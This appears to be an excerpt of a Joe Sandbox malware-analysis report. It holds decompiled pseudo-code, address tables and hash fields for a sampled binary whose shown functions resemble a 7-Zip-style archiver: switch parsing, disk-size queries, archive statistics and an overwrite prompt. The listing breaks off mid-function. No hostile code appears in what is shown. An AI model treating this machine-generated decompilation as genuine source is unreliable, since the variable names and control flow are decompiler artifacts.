                                                                                                    0x003fa67e
                                                                                                    0x003fa7f5
                                                                                                    0x003fa7f8
                                                                                                    0x003fa806
                                                                                                    0x003fa80e
                                                                                                    0x003fa80e
                                                                                                    0x003fa657
                                                                                                    0x003fa69e
                                                                                                    0x003fa6a3
                                                                                                    0x003fa6a6
                                                                                                    0x003fa6a8
                                                                                                    0x003fa7e8
                                                                                                    0x003fa7e8
                                                                                                    0x003fa7eb
                                                                                                    0x003fa7ee
                                                                                                    0x003fa7f3
                                                                                                    0x003fa7f3
                                                                                                    0x00000000
                                                                                                    0x003fa7f3
                                                                                                    0x003fa6b6
                                                                                                    0x003fa6bb
                                                                                                    0x003fa6bd
                                                                                                    0x003fa6da
                                                                                                    0x003fa6df
                                                                                                    0x003fa6e1
                                                                                                    0x003fa6f0
                                                                                                    0x003fa6f5
                                                                                                    0x003fa6f7
                                                                                                    0x003fa72e
                                                                                                    0x003fa733
                                                                                                    0x003fa735
                                                                                                    0x003fa75e
                                                                                                    0x003fa762
                                                                                                    0x003fa763
                                                                                                    0x003fa764
                                                                                                    0x003fa769
                                                                                                    0x003fa76b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fa771
                                                                                                    0x003fa774
                                                                                                    0x003fa7a1
                                                                                                    0x003fa7a3
                                                                                                    0x003fa7bc
                                                                                                    0x003fa7c1
                                                                                                    0x003fa7c3
                                                                                                    0x003fa7d5
                                                                                                    0x003fa7da
                                                                                                    0x003fa7dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fa7de
                                                                                                    0x003fa7e1
                                                                                                    0x003fa7e1
                                                                                                    0x003fa6c8
                                                                                                    0x003fa6c8
                                                                                                    0x00000000
                                                                                                    0x003fa6c8
                                                                                                    0x003fa7c5
                                                                                                    0x00000000
                                                                                                    0x003fa7c5
                                                                                                    0x003fa7ad
                                                                                                    0x00000000
                                                                                                    0x003fa7ad
                                                                                                    0x003fa776
                                                                                                    0x003fa77c
                                                                                                    0x003fa77f
                                                                                                    0x003fa74e
                                                                                                    0x003fa74e
                                                                                                    0x00000000
                                                                                                    0x003fa74e
                                                                                                    0x003fa781
                                                                                                    0x003fa783
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fa785
                                                                                                    0x003fa788
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fa78a
                                                                                                    0x003fa78d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fa78f
                                                                                                    0x003fa73d
                                                                                                    0x003fa742
                                                                                                    0x003fa744
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fa74a
                                                                                                    0x00000000
                                                                                                    0x003fa74a
                                                                                                    0x003fa6ff
                                                                                                    0x003fa703
                                                                                                    0x003fa708
                                                                                                    0x003fa70a
                                                                                                    0x003fa715
                                                                                                    0x003fa71c
                                                                                                    0x003fa71c
                                                                                                    0x00000000
                                                                                                    0x003fa70a
                                                                                                    0x003fa6e3
                                                                                                    0x003fa6c5
                                                                                                    0x003fa6c5
                                                                                                    0x00000000
                                                                                                    0x003fa6c5
                                                                                                    0x003fa6bf
                                                                                                    0x00000000
                                                                                                    0x003fa6bf
                                                                                                    0x003fa65d
                                                                                                    0x003fa665
                                                                                                    0x003fa676
                                                                                                    0x003fa679
                                                                                                    0x003fa67c
                                                                                                    0x003fa68e
                                                                                                    0x00000000
                                                                                                    0x003fa68e
                                                                                                    0x00000000
                                                                                                    0x003fa67c
                                                                                                    0x003fa667
                                                                                                    0x003fa66c
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003FA626
                                                                                                      • Part of subcall function 003B34A6: memmove.MSVCRT ref: 003B34CB
                                                                                                      • Part of subcall function 003FA574: __EH_prolog.LIBCMT ref: 003FA579
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$memmove
                                                                                                    • String ID: hcf$mtf$rsfx$B$B$B
                                                                                                    • API String ID: 593149739-3730501846
                                                                                                    • Opcode ID: 1c65580b6d5474774e444a4b4ffb5445a4971ddaf49dd967ec59b7e63b136427
                                                                                                    • Instruction ID: e2bb313a8dfa1bb0df8a144e1036ad25c4cc9776ec6d604472c44d13680fde51
                                                                                                    • Opcode Fuzzy Hash: 1c65580b6d5474774e444a4b4ffb5445a4971ddaf49dd967ec59b7e63b136427
                                                                                                    • Instruction Fuzzy Hash: 2B51E974A00509CBCF13FB90C480AFEB375AF41304B15C52AEA6A5F651DB78AD4AC792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B75EF Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B75EF(void** __ecx, void* __edi, long _a4) {
				char _v5;
				short _v10;
				long _v12;
				short _v14;
				char _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v44;
				void _v48;
				char _v56;
				char _v64;
				void* _v84;
				void* _v88;
				void _v96;
				void* _v108;
				void* _v112;
				void _v136;
				void* _t71;
				void* _t78;
				long _t101;
				signed int _t103;
				void** _t108;

				_t108 = __ecx;
				_t71 =  *__ecx;
				__ecx[2] = 0;
				__ecx[1] = 0;
				__ecx[3] = 0;
				if(_t71 == 0xffffffff || __ecx[1] == 0) {
					L23:
					return _t71;
				} else {
					_v5 = 1;
					_t71 = DeviceIoControl(_t71, 0x74004, 0, 0,  &_v96, 0x20,  &_v12, 0);
					if(_t71 != 0) {
						_t108[2] = _v88;
						_t108[3] = _v84;
						_t71 = _a4;
						_t101 = 0x5c;
						_t108[1] = 1;
						_v5 = 0;
						if( *_t71 == _t101 &&  *((intOrPtr*)(_t71 + 2)) == _t101 &&  *((short*)(_t71 + 4)) == 0x2e &&  *((intOrPtr*)(_t71 + 6)) == _t101 &&  *((short*)(_t71 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t71 + 0xc)) == 0) {
							_v12 = _t101;
							_v16 =  *((intOrPtr*)(_t71 + 8));
							_v14 = 0x3a;
							_v10 = 0;
							_t71 = E003B8F28( &_v16,  &_v64,  &_v24,  &_v56);
							if(_t71 == 0) {
								_v5 = 1;
							} else {
								_t108[2] = _v24;
								_t71 = _v20;
								_t108[3] = _t71;
							}
						}
					}
					if(_t108[1] == 0) {
						_t78 = DeviceIoControl( *_t108, 0x700a0, 0, 0,  &_v136, 0x28,  &_a4, 0) & 0xffffff00 | _t77 != 0x00000000;
						_t108[1] = _t78;
						if(_t78 == 0) {
							_t71 = DeviceIoControl( *_t108, 0x70000, 0, 0,  &_v48, 0x18,  &_a4, 0) & 0xffffff00 | _t81 != 0x00000000;
							_t108[1] = _t71;
							if(_t71 == 0) {
								_t71 = DeviceIoControl( *_t108, 0x2404c, 0, 0,  &_v48, 0x18,  &_a4, 0) & 0xffffff00 | _t87 != 0x00000000;
								_t108[1] = _t71;
							}
							if(_t108[1] != 0) {
								_t82 = _v28;
								_t103 = _v28 * _v32 >> 0x20;
								_t62 =  &_v36; // 0x3b7822
								_t71 = E0041F4B0(E0041F4B0(_t82 * _v32, _t103,  *_t62, 0), _t103, _v48, _v44);
								_t108[2] = _t71;
								_t108[3] = _t103;
							}
						} else {
							_t108[2] = _v112;
							_t71 = _v108;
							_t108[3] = _t71;
						}
					}
					if(_v5 == 0 || _t108[1] == 0) {
						goto L23;
					} else {
						_t71 = _t108[2] | _t108[3];
						if(_t71 == 0) {
							goto L23;
						}
						E003B74E3(_t108);
						return E003B74B4(_t108);
					}
				}
			}




























                                                                                                    0x003b75fa
                                                                                                    0x003b75fe
                                                                                                    0x003b7600
                                                                                                    0x003b7606
                                                                                                    0x003b7609
                                                                                                    0x003b760c
                                                                                                    0x003b7785
                                                                                                    0x003b7785
                                                                                                    0x003b761b
                                                                                                    0x003b7635
                                                                                                    0x003b7639
                                                                                                    0x003b763d
                                                                                                    0x003b7644
                                                                                                    0x003b764a
                                                                                                    0x003b764d
                                                                                                    0x003b7650
                                                                                                    0x003b7651
                                                                                                    0x003b7658
                                                                                                    0x003b765b
                                                                                                    0x003b7681
                                                                                                    0x003b7685
                                                                                                    0x003b7697
                                                                                                    0x003b769d
                                                                                                    0x003b76a1
                                                                                                    0x003b76a8
                                                                                                    0x003b76b8
                                                                                                    0x003b76aa
                                                                                                    0x003b76ad
                                                                                                    0x003b76b0
                                                                                                    0x003b76b3
                                                                                                    0x003b76b3
                                                                                                    0x003b76a8
                                                                                                    0x003b765b
                                                                                                    0x003b76bf
                                                                                                    0x003b76e0
                                                                                                    0x003b76e5
                                                                                                    0x003b76e8
                                                                                                    0x003b7710
                                                                                                    0x003b7715
                                                                                                    0x003b7718
                                                                                                    0x003b7732
                                                                                                    0x003b7735
                                                                                                    0x003b7735
                                                                                                    0x003b773b
                                                                                                    0x003b773d
                                                                                                    0x003b7741
                                                                                                    0x003b7744
                                                                                                    0x003b7756
                                                                                                    0x003b775b
                                                                                                    0x003b775e
                                                                                                    0x003b775e
                                                                                                    0x003b76ea
                                                                                                    0x003b76ed
                                                                                                    0x003b76f0
                                                                                                    0x003b76f3
                                                                                                    0x003b76f3
                                                                                                    0x003b76e8
                                                                                                    0x003b7765
                                                                                                    0x00000000
                                                                                                    0x003b776c
                                                                                                    0x003b776f
                                                                                                    0x003b7772
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b7776
                                                                                                    0x00000000
                                                                                                    0x003b777d
                                                                                                    0x003b7765

                                                                                                    APIs
                                                                                                    • DeviceIoControl.KERNEL32 ref: 003B7639
                                                                                                    • DeviceIoControl.KERNEL32 ref: 003B76DC
                                                                                                    • DeviceIoControl.KERNEL32 ref: 003B770C
                                                                                                    • DeviceIoControl.KERNEL32 ref: 003B772E
                                                                                                      • Part of subcall function 003B8F28: GetModuleHandleW.KERNEL32(kernel32.dll,GetDiskFreeSpaceExW,74651190,00000002,00000000,?,?,?,?,?,?,003B76A6,003B1AD1,003B7814,?,00000002), ref: 003B8F44
                                                                                                      • Part of subcall function 003B8F28: GetProcAddress.KERNEL32(00000000), ref: 003B8F4B
                                                                                                      • Part of subcall function 003B8F28: GetDiskFreeSpaceW.KERNEL32(00000002,?,003B7814,003B76A6,003B1AD1,?,?,?,?,?,?,003B76A6,003B1AD1,003B7814,?,00000002), ref: 003B8F9B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                                                    • String ID: "x;$:
                                                                                                    • API String ID: 4250411929-3430035823
                                                                                                    • Opcode ID: 7396a8e5103b8a77ea21cd46ce207848dd294d1d710d36b170cf0499126e6954
                                                                                                    • Instruction ID: a7e0dc08eff3c4ef3af44326a87c59d1810bdf8689b1b038590588991c25447a
                                                                                                    • Opcode Fuzzy Hash: 7396a8e5103b8a77ea21cd46ce207848dd294d1d710d36b170cf0499126e6954
                                                                                                    • Instruction Fuzzy Hash: A951C3B1908708AEDB22DBA8C841EEABBFCEF44308F05C45DE29597641D670AE44CB70
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B1265 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 137COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E003B1265(intOrPtr __ecx) {
				char _t71;
				signed int _t79;
				void* _t80;
				signed int _t82;
				signed int _t90;
				signed int* _t95;
				intOrPtr _t103;
				void* _t108;
				void* _t109;
				signed int _t115;
				char* _t118;
				signed int _t119;
				signed int _t120;
				signed int _t123;
				signed int _t127;
				char* _t128;
				void* _t130;

				E0041F1B0(E00422B48, _t130);
				_t95 =  *(_t130 + 8);
				_t123 = 0;
				 *((intOrPtr*)(_t130 - 0x10)) = __ecx;
				if(_t95[1] == 0 ||  *( *_t95) != 0x2d) {
					L33:
					_t71 = 0;
					goto L34;
				} else {
					 *(_t130 - 0x18) =  *(_t130 - 0x18) | 0xffffffff;
					 *(_t130 + 8) = 0;
					if( *((intOrPtr*)(_t130 + 0x10)) <= 0) {
						L12:
						_push("Unknown switch:");
						goto L32;
					} else {
						 *((intOrPtr*)(_t130 - 0x14)) =  *((intOrPtr*)(_t130 + 0xc));
						do {
							_t127 = 0;
							_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x14))));
							if( *_t118 == 0) {
								goto L6;
							} else {
								goto L5;
							}
							do {
								L5:
								_t127 = _t127 + 1;
							} while ( *((char*)(_t127 + _t118)) != 0);
							L6:
							if(_t127 >  *(_t130 - 0x18)) {
								_t14 = _t127 + 1; // 0x100
								if(_t14 <= _t95[1]) {
									_t15 =  *_t95 + 2; // 0x101
									if(E003B24C7(_t15, _t118) != 0) {
										_t123 =  *(_t130 + 8);
										 *(_t130 - 0x18) = _t127;
									}
								}
							}
							 *(_t130 + 8) =  *(_t130 + 8) + 1;
							 *((intOrPtr*)(_t130 - 0x14)) =  *((intOrPtr*)(_t130 - 0x14)) + 0xc;
						} while ( *(_t130 + 8) <  *((intOrPtr*)(_t130 + 0x10)));
						_t119 =  *(_t130 - 0x18);
						if(_t119 >= 0) {
							_t120 = _t119 + 1;
							_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x10)))) + (_t123 + _t123 * 4) * 4;
							_t103 =  *((intOrPtr*)(_t130 + 0xc));
							_t79 = _t123 + _t123 * 2;
							_t80 = _t103 + _t79 * 4;
							if( *((char*)(_t103 + 5 + _t79 * 4)) != 0 ||  *_t128 == 0) {
								 *_t128 = 1;
								 *((intOrPtr*)(_t130 + 0x10)) = _t95[1] - _t120;
								if( *((intOrPtr*)(_t130 + 0x10)) >= ( *(_t80 + 6) & 0x000000ff)) {
									 *(_t128 + 1) =  *(_t128 + 1) & 0x00000000;
									 *(_t128 + 4) =  *(_t128 + 4) | 0xffffffff;
									_t108 = ( *(_t80 + 4) & 0x000000ff) - 1;
									if(_t108 == 0) {
										if( *((intOrPtr*)(_t130 + 0x10)) != 1) {
											L30:
											if(_t120 == _t95[1]) {
												L26:
												_t71 = 1;
												L34:
												 *[fs:0x0] =  *((intOrPtr*)(_t130 - 0xc));
												return _t71;
											}
											_push("Too long switch:");
											goto L32;
										}
										_t82 =  *_t95 & 0xffffff00 |  *((short*)( *_t95 + _t120 * 2)) == 0x0000002d;
										 *(_t128 + 1) = _t82;
										if(_t82 != 0) {
											goto L26;
										}
										L24:
										_push("Incorrect switch postfix:");
										goto L32;
									}
									_t109 = _t108 - 1;
									if(_t109 == 0) {
										E003B2D8A(_t130 - 0x24,  *_t95 + _t120 * 2);
										 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
										_t129 = _t128 + 8;
										E003EF23F(_t128 + 8);
										_push(_t130 - 0x24);
										E003B1E40(E003B1524(_t129),  *((intOrPtr*)(_t130 - 0x24)));
										goto L26;
									}
									if(_t109 != 1 ||  *((intOrPtr*)(_t130 + 0x10)) != 1) {
										goto L30;
									} else {
										_t115 =  *_t95;
										_t121 =  *((intOrPtr*)(_t115 + _t120 * 2));
										if( *((intOrPtr*)(_t115 + _t120 * 2)) > 0x7f) {
											goto L24;
										}
										_t90 = E003B222D(_t80,  *((intOrPtr*)(_t80 + 8)), _t121);
										 *(_t128 + 4) = _t90;
										if(_t90 >= 0) {
											goto L26;
										}
										goto L24;
									}
								}
								_push("Too short switch:");
								goto L32;
							} else {
								_push("Multiple instances for switch:");
								L32:
								_t67 =  *((intOrPtr*)(_t130 - 0x10)) + 0x14; // 0x15
								E003B2711(_t67);
								goto L33;
							}
						}
						goto L12;
					}
				}
			}




















                                                                                                    0x003b126a
                                                                                                    0x003b1273
                                                                                                    0x003b1278
                                                                                                    0x003b127a
                                                                                                    0x003b1280
                                                                                                    0x003b13e2
                                                                                                    0x003b13e2
                                                                                                    0x00000000
                                                                                                    0x003b1292
                                                                                                    0x003b1292
                                                                                                    0x003b1299
                                                                                                    0x003b129c
                                                                                                    0x003b12f0
                                                                                                    0x003b12f0
                                                                                                    0x00000000
                                                                                                    0x003b129e
                                                                                                    0x003b12a1
                                                                                                    0x003b12a4
                                                                                                    0x003b12a7
                                                                                                    0x003b12a9
                                                                                                    0x003b12ae
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b12b0
                                                                                                    0x003b12b0
                                                                                                    0x003b12b0
                                                                                                    0x003b12b1
                                                                                                    0x003b12b7
                                                                                                    0x003b12ba
                                                                                                    0x003b12bf
                                                                                                    0x003b12c4
                                                                                                    0x003b12c8
                                                                                                    0x003b12d2
                                                                                                    0x003b12d4
                                                                                                    0x003b12d7
                                                                                                    0x003b12d7
                                                                                                    0x003b12d2
                                                                                                    0x003b12c4
                                                                                                    0x003b12da
                                                                                                    0x003b12dd
                                                                                                    0x003b12e4
                                                                                                    0x003b12e9
                                                                                                    0x003b12ee
                                                                                                    0x003b1300
                                                                                                    0x003b1303
                                                                                                    0x003b1306
                                                                                                    0x003b1309
                                                                                                    0x003b1311
                                                                                                    0x003b1314
                                                                                                    0x003b1325
                                                                                                    0x003b132d
                                                                                                    0x003b1337
                                                                                                    0x003b1343
                                                                                                    0x003b1347
                                                                                                    0x003b134f
                                                                                                    0x003b1350
                                                                                                    0x003b13b8
                                                                                                    0x003b13cd
                                                                                                    0x003b13d0
                                                                                                    0x003b13b0
                                                                                                    0x003b13b0
                                                                                                    0x003b13e4
                                                                                                    0x003b13ea
                                                                                                    0x003b13f2
                                                                                                    0x003b13f2
                                                                                                    0x003b13d2
                                                                                                    0x00000000
                                                                                                    0x003b13d2
                                                                                                    0x003b13c1
                                                                                                    0x003b13c6
                                                                                                    0x003b13c9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b1379
                                                                                                    0x003b1379
                                                                                                    0x00000000
                                                                                                    0x003b1379
                                                                                                    0x003b1352
                                                                                                    0x003b1353
                                                                                                    0x003b1389
                                                                                                    0x003b138e
                                                                                                    0x003b1392
                                                                                                    0x003b1397
                                                                                                    0x003b13a1
                                                                                                    0x003b13aa
                                                                                                    0x00000000
                                                                                                    0x003b13af
                                                                                                    0x003b1356
                                                                                                    0x00000000
                                                                                                    0x003b135e
                                                                                                    0x003b135e
                                                                                                    0x003b1360
                                                                                                    0x003b1368
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b136d
                                                                                                    0x003b1374
                                                                                                    0x003b1377
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b1377
                                                                                                    0x003b1356
                                                                                                    0x003b1339
                                                                                                    0x00000000
                                                                                                    0x003b131b
                                                                                                    0x003b131b
                                                                                                    0x003b13d7
                                                                                                    0x003b13da
                                                                                                    0x003b13dd
                                                                                                    0x00000000
                                                                                                    0x003b13dd
                                                                                                    0x003b1314
                                                                                                    0x00000000
                                                                                                    0x003b12ee
                                                                                                    0x003b129c

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                    • API String ID: 3519838083-2104980125
                                                                                                    • Opcode ID: 190f9285b06fefad449e3daf8ca0d0eae050c9a378b4270f2eafae9d9cb6bc5a
                                                                                                    • Instruction ID: eaf81d5af4b4439cb3ca8d9b77993bc22124e43640b1f54908c25f8f1aae7943
                                                                                                    • Opcode Fuzzy Hash: 190f9285b06fefad449e3daf8ca0d0eae050c9a378b4270f2eafae9d9cb6bc5a
                                                                                                    • Instruction Fuzzy Hash: EC51D131A0025ADBCF16CF54C4A0AEEBBF1EF01308F95859AD6199BD51E770EE41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E605A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 80%
                                                                                                    			E003E605A(void* __ecx, void* __edx) {
				void* __edi;
				void* _t38;
				signed int _t42;
				signed int _t45;
				void* _t55;
				void* _t59;
				signed int _t67;
				signed int _t70;
				void* _t76;
				void* _t83;
				intOrPtr _t86;
				void* _t88;

				_t76 = __edx;
				E0041F1B0(E004260E0, _t88);
				_t83 = __ecx;
				_t59 = __ecx + 8;
				if( *((intOrPtr*)(__ecx + 0xac)) != 0) {
					E003EB5FA(_t59, __ecx, 1);
				}
				if( *((char*)(_t83 + 0x139)) != 0) {
					_t95 =  *((intOrPtr*)(_t83 + 0xb8));
					if( *((intOrPtr*)(_t83 + 0xb8)) != 0) {
						_t86 =  *((intOrPtr*)(_t88 + 8));
						_t55 = _t86 + 4;
						_push(_t55);
						L003E592B(_t83, _t95);
						_push(E003B2690(_t88 - 0x18));
						_push(1);
						 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
						_push(1);
						_push(_t55);
						_push( *((intOrPtr*)(_t86 + 0x2c)));
						_push( *((intOrPtr*)(_t86 + 0x28)));
						_t38 = L003E5C56(_t83, _t76, _t95);
						 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
						E003B1E40(_t38,  *((intOrPtr*)(_t88 - 0x18)));
						_t56 =  *((intOrPtr*)(_t83 + 0xb8));
						E003B1FA0( *((intOrPtr*)(_t83 + 0xb8)));
						E003B1FA0(_t56);
						if( *((intOrPtr*)(_t86 + 0x18)) != 1 ||  *((intOrPtr*)(_t86 + 0x1c)) != 0 || ( *(_t86 + 0x10) |  *(_t86 + 0x14)) != 0) {
							_t42 =  *(_t86 + 0x10);
							_t67 =  *(_t86 + 0x14);
							_t99 = _t42 | _t67;
							if((_t42 | _t67) != 0) {
								E003E600F(_t83, _t99, "Folders", _t42, _t67);
							}
							E003E600F(_t83, _t99, "Files",  *((intOrPtr*)(_t86 + 0x18)),  *((intOrPtr*)(_t86 + 0x1c)));
						}
						E003E600F(_t83, _t99, "Size",  *((intOrPtr*)(_t86 + 0x28)),  *((intOrPtr*)(_t86 + 0x2c)));
						_t45 =  *(_t86 + 0x20);
						_t70 =  *(_t86 + 0x24);
						_t100 = _t45 | _t70;
						if((_t45 | _t70) != 0) {
							E003E600F(_t83, _t100, "Alternate streams", _t45, _t70);
							E003E600F(_t83, _t100, "Alternate streams size",  *((intOrPtr*)(_t86 + 0x30)),  *((intOrPtr*)(_t86 + 0x34)));
						}
						E003B1FA0( *((intOrPtr*)(_t83 + 0xb8)));
						L003E5F0E( *((intOrPtr*)(_t83 + 0xb8)), _t86);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return 0;
			}















                                                                                                    0x003e605a
                                                                                                    0x003e605f
                                                                                                    0x003e6068
                                                                                                    0x003e6071
                                                                                                    0x003e6074
                                                                                                    0x003e6078
                                                                                                    0x003e6078
                                                                                                    0x003e6084
                                                                                                    0x003e608a
                                                                                                    0x003e6091
                                                                                                    0x003e6099
                                                                                                    0x003e609e
                                                                                                    0x003e60a1
                                                                                                    0x003e60a2
                                                                                                    0x003e60af
                                                                                                    0x003e60b0
                                                                                                    0x003e60b2
                                                                                                    0x003e60b6
                                                                                                    0x003e60b8
                                                                                                    0x003e60bb
                                                                                                    0x003e60be
                                                                                                    0x003e60c1
                                                                                                    0x003e60c9
                                                                                                    0x003e60cd
                                                                                                    0x003e60d2
                                                                                                    0x003e60db
                                                                                                    0x003e60e2
                                                                                                    0x003e60eb
                                                                                                    0x003e60fb
                                                                                                    0x003e60fe
                                                                                                    0x003e6103
                                                                                                    0x003e6105
                                                                                                    0x003e6110
                                                                                                    0x003e6110
                                                                                                    0x003e6122
                                                                                                    0x003e6122
                                                                                                    0x003e6134
                                                                                                    0x003e6139
                                                                                                    0x003e613c
                                                                                                    0x003e6141
                                                                                                    0x003e6143
                                                                                                    0x003e614e
                                                                                                    0x003e6160
                                                                                                    0x003e6160
                                                                                                    0x003e616b
                                                                                                    0x003e6178
                                                                                                    0x003e617e
                                                                                                    0x003e6091
                                                                                                    0x003e6185
                                                                                                    0x003e618d

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E605F
                                                                                                      • Part of subcall function 003EB5FA: fputs.MSVCRT ref: 003EB663
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prologfputs
                                                                                                    • String ID: Alternate streams$Alternate streams size$Files$Folders$Size
                                                                                                    • API String ID: 1798449854-232602582
                                                                                                    • Opcode ID: 790ed5e8f3483240197e390556a4d7e1d629d480b5afb491205f202b5bf03f8d
                                                                                                    • Instruction ID: d0d6a235f737949b8b0fe7a9baf18c53b57aaf72c8b72b1ae2a6acd90664d881
                                                                                                    • Opcode Fuzzy Hash: 790ed5e8f3483240197e390556a4d7e1d629d480b5afb491205f202b5bf03f8d
                                                                                                    • Instruction Fuzzy Hash: BE31D031700B60ABCB26AB22C892BABB7B6AF94340F00471DF546566D2CB74BC44DB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E46D1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E46D1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int* _a32) {
				void* __ebp;
				void* _t23;
				signed int _t25;
				struct _IO_FILE** _t46;
				intOrPtr _t49;
				void* _t50;

				EnterCriticalSection(0x43a878);
				_t23 = E003E571F();
				if(_t23 == 0) {
					_t49 = _a4;
					E003E480A(_t49);
					_t46 =  *(_t49 + 0xc8);
					if(_t46 != 0) {
						E003B1FA0(_t46);
						fputs("Would you like to replace the existing file:\n",  *_t46);
						E003E4831( *(_t49 + 0xc8), _a8, _a12, _a16);
						fputs("with the file from archive:\n",  *( *(_t49 + 0xc8)));
						E003E4831( *(_t49 + 0xc8), _a20, _a24, _a28);
					}
					_t25 = E003ECB4F( *(_t49 + 0xc8));
					if(_t25 > 7) {
						L16:
						_t50 = 0x80004005;
						goto L17;
					} else {
						switch( *((intOrPtr*)(_t25 * 4 +  &M003E47EA))) {
							case 0:
								 *_a32 =  *_a32 & 0x00000000;
								goto L12;
							case 1:
								 *_a32 = 2;
								goto L12;
							case 2:
								 *_a32 = 1;
								goto L12;
							case 3:
								 *_a32 = 3;
								goto L12;
							case 4:
								 *_a32 = 4;
								L12:
								__ecx =  *((intOrPtr*)(__esi + 0xc8));
								if(__ecx != 0) {
									E003B1FA0(__ecx);
									if( *((char*)(__esi + 0x160)) != 0) {
